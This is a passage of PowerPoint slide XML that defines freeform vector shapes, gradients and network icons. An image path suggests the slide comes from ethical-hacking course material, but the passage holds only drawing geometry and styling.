                        <a:pt x="25" y="47"/>
                        <a:pt x="38" y="47"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="77" y="61"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="77" y="57"/>
                        <a:pt x="74" y="54"/>
                        <a:pt x="71" y="54"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="54"/>
                        <a:pt x="5" y="54"/>
                        <a:pt x="5" y="54"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="54"/>
                        <a:pt x="0" y="57"/>
                        <a:pt x="0" y="61"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="107"/>
                        <a:pt x="0" y="101"/>
                        <a:pt x="0" y="101"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="105"/>
                        <a:pt x="2" y="108"/>
                        <a:pt x="5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4" y="108"/>
                        <a:pt x="77" y="105"/>
                        <a:pt x="77" y="101"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="77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722" name="Freeform 666">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{286333DC-7997-49E0-9A54-CC91C7D370E7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="8141604" y="5072437"/>
              <a:ext cx="2713218" cy="728452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E24203">
                    <a:gamma/>
                    <a:tint val="68627"/>
                    <a:invGamma/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="E24203"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gradFill>
            <a:ln w="19050" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="bg1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pic>
          <p:nvPicPr>
            <p:cNvPr id="1723" name="Picture 3" descr="Y:\CEH v7 - Haja\Icon Shock\CLEAN\Networking\access_point_256.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB2A52E0-9BD4-4E4D-9001-5C996A331B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29885" y="4894317"/>
              <a:ext cx="706320" cy="70632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724" name="Group 914">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5415C728-7DDF-46B6-B3D3-BBCC1C0CE4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07673" y="2324010"/>
              <a:ext cx="672676" cy="579064"/>
              <a:chOff x="4127" y="1852"/>
              <a:chExt cx="503" cy="433"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1848" name="Freeform 908">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19434E21-28E2-42F2-8A93-7993BA2FFEA3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4343" y="1910"/>
                <a:ext cx="287" cy="375"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1809"/>
                  <a:gd name="T1" fmla="*/ 0 h 2360"/>
                  <a:gd name="T2" fmla="*/ 1809 w 1809"/>
                  <a:gd name="T3" fmla="*/ 487 h 2360"/>
                  <a:gd name="T4" fmla="*/ 1809 w 1809"/>
                  <a:gd name="T5" fmla="*/ 2360 h 2360"/>
                  <a:gd name="T6" fmla="*/ 0 w 1809"/>
                  <a:gd name="T7" fmla="*/ 1873 h 2360"/>
                  <a:gd name="T8" fmla="*/ 0 w 1809"/>
                  <a:gd name="T9" fmla="*/ 0 h 2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09" h="2360">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1809" y="487"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1809" y="2360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="187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folHlink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49" name="Freeform 909">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A837F61B-A72E-412C-8757-F9F53431DD3C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4127" y="1929"/>
                <a:ext cx="216" cy="356"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1358"/>
                  <a:gd name="T1" fmla="*/ 366 h 2239"/>
                  <a:gd name="T2" fmla="*/ 1358 w 1358"/>
                  <a:gd name="T3" fmla="*/ 0 h 2239"/>
                  <a:gd name="T4" fmla="*/ 1358 w 1358"/>
                  <a:gd name="T5" fmla="*/ 1875 h 2239"/>
                  <a:gd name="T6" fmla="*/ 0 w 1358"/>
                  <a:gd name="T7" fmla="*/ 2239 h 2239"/>
                  <a:gd name="T8" fmla="*/ 0 w 1358"/>
                  <a:gd name="T9" fmla="*/ 366 h 2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8" h="2239">
                    <a:moveTo>
                      <a:pt x="0" y="366"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1358" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1358" y="1875"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36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50" name="Freeform 910">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C113E731-5863-4F1D-A499-13560C65B4D7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4127" y="1852"/>
                <a:ext cx="503" cy="135"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3167"/>
                  <a:gd name="T1" fmla="*/ 364 h 851"/>
                  <a:gd name="T2" fmla="*/ 1809 w 3167"/>
                  <a:gd name="T3" fmla="*/ 851 h 851"/>
                  <a:gd name="T4" fmla="*/ 3167 w 3167"/>
                  <a:gd name="T5" fmla="*/ 485 h 851"/>
                  <a:gd name="T6" fmla="*/ 1356 w 3167"/>
                  <a:gd name="T7" fmla="*/ 0 h 851"/>
                  <a:gd name="T8" fmla="*/ 0 w 3167"/>
                  <a:gd name="T9" fmla="*/ 364 h 8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67" h="851">
                    <a:moveTo>
                      <a:pt x="0" y="364"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1809" y="851"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3167" y="485"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1356" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="364"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="folHlink"/>
              </a:soli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725" name="Freeform 905">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3996293-3389-41E6-97E6-4C47F392BB32}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="9363541" y="1211016"/>
              <a:ext cx="469403" cy="2619827"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 349 w 351"/>
                <a:gd name="T1" fmla="*/ 1810 h 1810"/>
                <a:gd name="T2" fmla="*/ 0 w 351"/>
                <a:gd name="T3" fmla="*/ 1714 h 1810"/>
                <a:gd name="T4" fmla="*/ 1 w 351"/>
                <a:gd name="T5" fmla="*/ 0 h 1810"/>
                <a:gd name="T6" fmla="*/ 351 w 351"/>
                <a:gd name="T7" fmla="*/ 94 h 1810"/>
                <a:gd name="T8" fmla="*/ 349 w 351"/>
                <a:gd name="T9" fmla="*/ 1810 h 1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1" h="1810">
                  <a:moveTo>
                    <a:pt x="349" y="1810"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351" y="94"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349" y="1810"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="C0C0C0">
                    <a:gamma/>
                    <a:tint val="62745"/>
                    <a:invGamma/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:srgbClr val="C0C0C0">
                    <a:alpha val="50000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="C0C0C0">
                    <a:gamma/>
                    <a:tint val="62745"/>
                    <a:invGamma/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="0" scaled="1"/>
            </a:gradFill>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="80808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726" name="Group 939">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDDFBDD2-1109-4E80-909C-2B298FF806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4736" y="2582115"/>
              <a:ext cx="1738528" cy="699423"/>
              <a:chOff x="3397" y="2065"/>
              <a:chExt cx="1300" cy="523"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1799" name="Freeform 415">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52F49F89-8105-4067-9FC0-EDF321CEFA0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97" y="2238"/>
                <a:ext cx="1300" cy="350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ACACA"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="B2B2B2"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:ln w="190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800" name="Group 490">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32999E94-1591-43D3-85F8-A67684DEFF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3830" y="2065"/>
                <a:ext cx="134" cy="323"/>
                <a:chOff x="558" y="-2537"/>
                <a:chExt cx="470" cy="1139"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1835" name="Freeform 491">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DBF1469-A2D4-4F6B-A1A2-FDE7496D592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78" y="-1977"/>
                  <a:ext cx="211" cy="579"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 62 w 89"/>
                    <a:gd name="T1" fmla="*/ 20 h 245"/>
                    <a:gd name="T2" fmla="*/ 11 w 89"/>
                    <a:gd name="T3" fmla="*/ 11 h 245"/>
                    <a:gd name="T4" fmla="*/ 2 w 89"/>
                    <a:gd name="T5" fmla="*/ 0 h 245"/>
                    <a:gd name="T6" fmla="*/ 2 w 89"/>
                    <a:gd name="T7" fmla="*/ 36 h 245"/>
                    <a:gd name="T8" fmla="*/ 2 w 89"/>
                    <a:gd name="T9" fmla="*/ 206 h 245"/>
                    <a:gd name="T10" fmla="*/ 43 w 89"/>
                    <a:gd name="T11" fmla="*/ 205 h 245"/>
                    <a:gd name="T12" fmla="*/ 43 w 89"/>
                    <a:gd name="T13" fmla="*/ 211 h 245"/>
                    <a:gd name="T14" fmla="*/ 88 w 89"/>
                    <a:gd name="T15" fmla="*/ 218 h 245"/>
                    <a:gd name="T16" fmla="*/ 88 w 89"/>
                    <a:gd name="T17" fmla="*/ 156 h 245"/>
                    <a:gd name="T18" fmla="*/ 89 w 89"/>
                    <a:gd name="T19" fmla="*/ 7 h 245"/>
                    <a:gd name="T20" fmla="*/ 89 w 89"/>
                    <a:gd name="T21" fmla="*/ 5 h 245"/>
                    <a:gd name="T22" fmla="*/ 89 w 89"/>
                    <a:gd name="T23" fmla="*/ 5 h 245"/>
                    <a:gd name="T24" fmla="*/ 62 w 89"/>
                    <a:gd name="T25" fmla="*/ 20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89" h="245">
                      <a:moveTo>
                        <a:pt x="62" y="20"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="20"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="11" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="10"/>
                        <a:pt x="3" y="5"/>
                        <a:pt x="2" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="18"/>
                        <a:pt x="2" y="32"/>
                        <a:pt x="2" y="36"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="49"/>
                        <a:pt x="0" y="181"/>
                        <a:pt x="2" y="206"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="229"/>
                        <a:pt x="43" y="225"/>
                        <a:pt x="43" y="205"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="207"/>
                        <a:pt x="43" y="211"/>
                        <a:pt x="43" y="211"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="245"/>
                        <a:pt x="86" y="235"/>
                        <a:pt x="88" y="218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="89" y="201"/>
                        <a:pt x="88" y="171"/>
                        <a:pt x="88" y="156"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="88" y="141"/>
                        <a:pt x="89" y="47"/>
                        <a:pt x="89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9" y="5"/>
                        <a:pt x="89" y="5"/>
                        <a:pt x="89" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="86" y="16"/>
                        <a:pt x="70" y="22"/>
                        <a:pt x="62" y="20"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="39A962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36" name="Freeform 492">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8CC8422-9EB4-4144-8D1B-C3592D3BD96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78" y="-1977"/>
                  <a:ext cx="211" cy="579"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 62 w 89"/>
                    <a:gd name="T1" fmla="*/ 20 h 245"/>
                    <a:gd name="T2" fmla="*/ 11 w 89"/>
                    <a:gd name="T3" fmla="*/ 11 h 245"/>
                    <a:gd name="T4" fmla="*/ 2 w 89"/>
                    <a:gd name="T5" fmla="*/ 0 h 245"/>
                    <a:gd name="T6" fmla="*/ 2 w 89"/>
                    <a:gd name="T7" fmla="*/ 36 h 245"/>
                    <a:gd name="T8" fmla="*/ 2 w 89"/>
                    <a:gd name="T9" fmla="*/ 206 h 245"/>
                    <a:gd name="T10" fmla="*/ 43 w 89"/>
                    <a:gd name="T11" fmla="*/ 205 h 245"/>
                    <a:gd name="T12" fmla="*/ 43 w 89"/>
                    <a:gd name="T13" fmla="*/ 211 h 245"/>
                    <a:gd name="T14" fmla="*/ 88 w 89"/>
                    <a:gd name="T15" fmla="*/ 218 h 245"/>
                    <a:gd name="T16" fmla="*/ 88 w 89"/>
                    <a:gd name="T17" fmla="*/ 156 h 245"/>
                    <a:gd name="T18" fmla="*/ 89 w 89"/>
                    <a:gd name="T19" fmla="*/ 7 h 245"/>
                    <a:gd name="T20" fmla="*/ 89 w 89"/>
                    <a:gd name="T21" fmla="*/ 5 h 245"/>
                    <a:gd name="T22" fmla="*/ 89 w 89"/>
                    <a:gd name="T23" fmla="*/ 5 h 245"/>
                    <a:gd name="T24" fmla="*/ 62 w 89"/>
                    <a:gd name="T25" fmla="*/ 20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89" h="245">
                      <a:moveTo>
                        <a:pt x="62" y="20"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="20"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="11" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="10"/>
                        <a:pt x="3" y="5"/>
                        <a:pt x="2" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="18"/>
                        <a:pt x="2" y="32"/>
                        <a:pt x="2" y="36"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="49"/>
                        <a:pt x="0" y="181"/>
                        <a:pt x="2" y="206"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="229"/>
                        <a:pt x="43" y="225"/>
                        <a:pt x="43" y="205"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="207"/>
                        <a:pt x="43" y="211"/>
                        <a:pt x="43" y="211"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="245"/>
                        <a:pt x="86" y="235"/>
                        <a:pt x="88" y="218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="89" y="201"/>
                        <a:pt x="88" y="171"/>
                        <a:pt x="88" y="156"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="88" y="141"/>
                        <a:pt x="89" y="47"/>
                        <a:pt x="89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9" y="5"/>
                        <a:pt x="89" y="5"/>
                        <a:pt x="89" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="86" y="16"/>
                        <a:pt x="70" y="22"/>
                        <a:pt x="62" y="20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37" name="Freeform 493">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44CCC07F-267B-4415-9FAA-67590D1E8B2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58" y="-2365"/>
                  <a:ext cx="470" cy="548"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 193 w 199"/>
                    <a:gd name="T1" fmla="*/ 194 h 232"/>
                    <a:gd name="T2" fmla="*/ 169 w 199"/>
                    <a:gd name="T3" fmla="*/ 49 h 232"/>
                    <a:gd name="T4" fmla="*/ 143 w 199"/>
                    <a:gd name="T5" fmla="*/ 24 h 232"/>
                    <a:gd name="T6" fmla="*/ 100 w 199"/>
                    <a:gd name="T7" fmla="*/ 13 h 232"/>
                    <a:gd name="T8" fmla="*/ 60 w 199"/>
                    <a:gd name="T9" fmla="*/ 2 h 232"/>
                    <a:gd name="T10" fmla="*/ 31 w 199"/>
                    <a:gd name="T11" fmla="*/ 12 h 232"/>
                    <a:gd name="T12" fmla="*/ 4 w 199"/>
                    <a:gd name="T13" fmla="*/ 159 h 232"/>
                    <a:gd name="T14" fmla="*/ 36 w 199"/>
                    <a:gd name="T15" fmla="*/ 168 h 232"/>
                    <a:gd name="T16" fmla="*/ 54 w 199"/>
                    <a:gd name="T17" fmla="*/ 47 h 232"/>
                    <a:gd name="T18" fmla="*/ 53 w 199"/>
                    <a:gd name="T19" fmla="*/ 164 h 232"/>
                    <a:gd name="T20" fmla="*/ 63 w 199"/>
                    <a:gd name="T21" fmla="*/ 175 h 232"/>
                    <a:gd name="T22" fmla="*/ 113 w 199"/>
                    <a:gd name="T23" fmla="*/ 189 h 232"/>
                    <a:gd name="T24" fmla="*/ 140 w 199"/>
                    <a:gd name="T25" fmla="*/ 169 h 232"/>
                    <a:gd name="T26" fmla="*/ 140 w 199"/>
                    <a:gd name="T27" fmla="*/ 169 h 232"/>
                    <a:gd name="T28" fmla="*/ 138 w 199"/>
                    <a:gd name="T29" fmla="*/ 88 h 232"/>
                    <a:gd name="T30" fmla="*/ 136 w 199"/>
                    <a:gd name="T31" fmla="*/ 71 h 232"/>
                    <a:gd name="T32" fmla="*/ 136 w 199"/>
                    <a:gd name="T33" fmla="*/ 70 h 232"/>
                    <a:gd name="T34" fmla="*/ 136 w 199"/>
                    <a:gd name="T35" fmla="*/ 71 h 232"/>
                    <a:gd name="T36" fmla="*/ 138 w 199"/>
                    <a:gd name="T37" fmla="*/ 88 h 232"/>
                    <a:gd name="T38" fmla="*/ 160 w 199"/>
                    <a:gd name="T39" fmla="*/ 204 h 232"/>
                    <a:gd name="T40" fmla="*/ 193 w 199"/>
                    <a:gd name="T41" fmla="*/ 194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9" h="232">
                      <a:moveTo>
                        <a:pt x="193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7"/>
                        <a:pt x="143" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="21"/>
                        <a:pt x="113" y="16"/>
                        <a:pt x="100" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="89" y="10"/>
                        <a:pt x="69" y="4"/>
                        <a:pt x="60" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="34" y="4"/>
                        <a:pt x="31" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29" y="17"/>
                        <a:pt x="8" y="139"/>
                        <a:pt x="4" y="159"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="181"/>
                        <a:pt x="31" y="184"/>
                        <a:pt x="36" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="158"/>
                        <a:pt x="55" y="38"/>
                        <a:pt x="54" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="53"/>
                        <a:pt x="53" y="122"/>
                        <a:pt x="53" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="169"/>
                        <a:pt x="56" y="174"/>
                        <a:pt x="63" y="175"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="177"/>
                        <a:pt x="106" y="187"/>
                        <a:pt x="113" y="189"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="122" y="190"/>
                        <a:pt x="137" y="181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1"/>
                        <a:pt x="138" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="79"/>
                        <a:pt x="137" y="74"/>
                        <a:pt x="136" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="70"/>
                        <a:pt x="136" y="70"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="70"/>
                        <a:pt x="136" y="70"/>
                        <a:pt x="136" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="76"/>
                        <a:pt x="138" y="82"/>
                        <a:pt x="138" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="142" y="110"/>
                        <a:pt x="148" y="150"/>
                        <a:pt x="160" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="232"/>
                        <a:pt x="199" y="218"/>
                        <a:pt x="193" y="194"/>
                      </a:cubicBezTo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38" name="Freeform 494">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CD003F8-A47F-40DB-9DF8-4E05FFD3D31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58" y="-2365"/>
                  <a:ext cx="470" cy="548"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 193 w 199"/>
                    <a:gd name="T1" fmla="*/ 194 h 232"/>
                    <a:gd name="T2" fmla="*/ 169 w 199"/>
                    <a:gd name="T3" fmla="*/ 49 h 232"/>
                    <a:gd name="T4" fmla="*/ 143 w 199"/>
                    <a:gd name="T5" fmla="*/ 24 h 232"/>
                    <a:gd name="T6" fmla="*/ 100 w 199"/>
                    <a:gd name="T7" fmla="*/ 13 h 232"/>
                    <a:gd name="T8" fmla="*/ 60 w 199"/>
                    <a:gd name="T9" fmla="*/ 2 h 232"/>
                    <a:gd name="T10" fmla="*/ 31 w 199"/>
                    <a:gd name="T11" fmla="*/ 12 h 232"/>
                    <a:gd name="T12" fmla="*/ 4 w 199"/>
                    <a:gd name="T13" fmla="*/ 159 h 232"/>
                    <a:gd name="T14" fmla="*/ 36 w 199"/>
                    <a:gd name="T15" fmla="*/ 168 h 232"/>
                    <a:gd name="T16" fmla="*/ 54 w 199"/>
                    <a:gd name="T17" fmla="*/ 47 h 232"/>
                    <a:gd name="T18" fmla="*/ 53 w 199"/>
                    <a:gd name="T19" fmla="*/ 164 h 232"/>
                    <a:gd name="T20" fmla="*/ 63 w 199"/>
                    <a:gd name="T21" fmla="*/ 175 h 232"/>
                    <a:gd name="T22" fmla="*/ 113 w 199"/>
                    <a:gd name="T23" fmla="*/ 189 h 232"/>
                    <a:gd name="T24" fmla="*/ 140 w 199"/>
                    <a:gd name="T25" fmla="*/ 169 h 232"/>
                    <a:gd name="T26" fmla="*/ 140 w 199"/>
                    <a:gd name="T27" fmla="*/ 169 h 232"/>
                    <a:gd name="T28" fmla="*/ 138 w 199"/>
                    <a:gd name="T29" fmla="*/ 88 h 232"/>
                    <a:gd name="T30" fmla="*/ 136 w 199"/>
                    <a:gd name="T31" fmla="*/ 71 h 232"/>
                    <a:gd name="T32" fmla="*/ 136 w 199"/>
                    <a:gd name="T33" fmla="*/ 70 h 232"/>
                    <a:gd name="T34" fmla="*/ 136 w 199"/>
                    <a:gd name="T35" fmla="*/ 71 h 232"/>
                    <a:gd name="T36" fmla="*/ 138 w 199"/>
                    <a:gd name="T37" fmla="*/ 88 h 232"/>
                    <a:gd name="T38" fmla="*/ 160 w 199"/>
                    <a:gd name="T39" fmla="*/ 204 h 232"/>
                    <a:gd name="T40" fmla="*/ 193 w 199"/>
                    <a:gd name="T41" fmla="*/ 194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9" h="232">
                      <a:moveTo>
                        <a:pt x="193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7"/>
                        <a:pt x="143" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="21"/>
                        <a:pt x="113" y="16"/>
                        <a:pt x="100" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="89" y="10"/>
                        <a:pt x="69" y="4"/>
                        <a:pt x="60" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="34" y="4"/>
                        <a:pt x="31" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29" y="17"/>
                        <a:pt x="8" y="139"/>
                        <a:pt x="4" y="159"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="181"/>
                        <a:pt x="31" y="184"/>
                        <a:pt x="36" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="158"/>
                        <a:pt x="55" y="38"/>
                        <a:pt x="54" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="53"/>
                        <a:pt x="53" y="122"/>
                        <a:pt x="53" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="169"/>
                        <a:pt x="56" y="174"/>
                        <a:pt x="63" y="175"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="177"/>
                        <a:pt x="106" y="187"/>
                        <a:pt x="113" y="189"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="122" y="190"/>
                        <a:pt x="137" y="181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1"/>
                        <a:pt x="138" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="79"/>
                        <a:pt x="137" y="74"/>
                        <a:pt x="136" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="70"/>
                        <a:pt x="136" y="70"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="70"/>
                        <a:pt x="136" y="70"/>
                        <a:pt x="136" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="76"/>
                        <a:pt x="138" y="82"/>
                        <a:pt x="138" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="142" y="110"/>
                        <a:pt x="148" y="150"/>
